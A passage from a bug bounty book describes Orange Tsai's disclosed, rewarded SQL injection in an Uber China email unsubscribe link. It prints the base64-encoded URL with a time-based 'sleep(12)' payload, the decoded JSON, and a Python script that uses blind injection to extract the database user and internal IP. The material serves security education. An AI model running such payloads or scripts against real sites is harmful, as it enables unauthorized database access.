Bug Bounty Hunting Essentials
上QQ阅读APP看书,第一时间看更新

Uber SQL injection

  • Title: SQL injection on sctrack.email.uber.com.cn.
  • Reported by: Orange.
  • Bounty Rewarded: $4,000.
  • Web application URL: http://sctrack.email.uber.com.cn.
  • Description: Uber is a famous ride-hailing server; it is one of the biggest in the world and is used in a number of cities around the world by people who want to move from one place to another. The reporter in this case, who is Orange Tsai, a famous bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location; now. like any rider. the first thing to do is to unsubscribe from that email. That is what Orange did, but bug bounty hunters have keen eyes; Orange observed that the unsubscribe link that he received in China was different from the one he received in normal circumstances. Reviewing the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.

The p parameter contains number strings that are sent to the backend server once the link is visited. The character string in p is basically base64-encoded text with a time-based SQL command. But originally, my analysis concludes that the p parameter contains two sections: user_id, which indicated the user identifier, and receiver, which is the receiving email address. Orange identified that he could incorporate a time-based SQL string in the user_id parameter, which looks something like this:

{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"} 

So, the sleep(12) command as the output delays the response by 12 seconds. This is what we call the hello world of proofs of concept. From there on, Orange created a script using which he could enumerate the database name and current user. A snippet from the script is as follows:

base = string.digits + '_-@.' 
payload = {"user_id": 5755, "receiver": "blog.orange.tw"} 
 
for l in range(0, 30): 
for i in 'i'+base: 
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i) 
new_payload = json.dumps(payload) 
new_payload = b64encode(new_payload) 
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload)) 

Basically, what the script does is craft a time-based payload and send an HTTP request to the target server, which returns the current user and the database in the response, as follows:

sendcloud_w@10.9.79.210 
sendcloud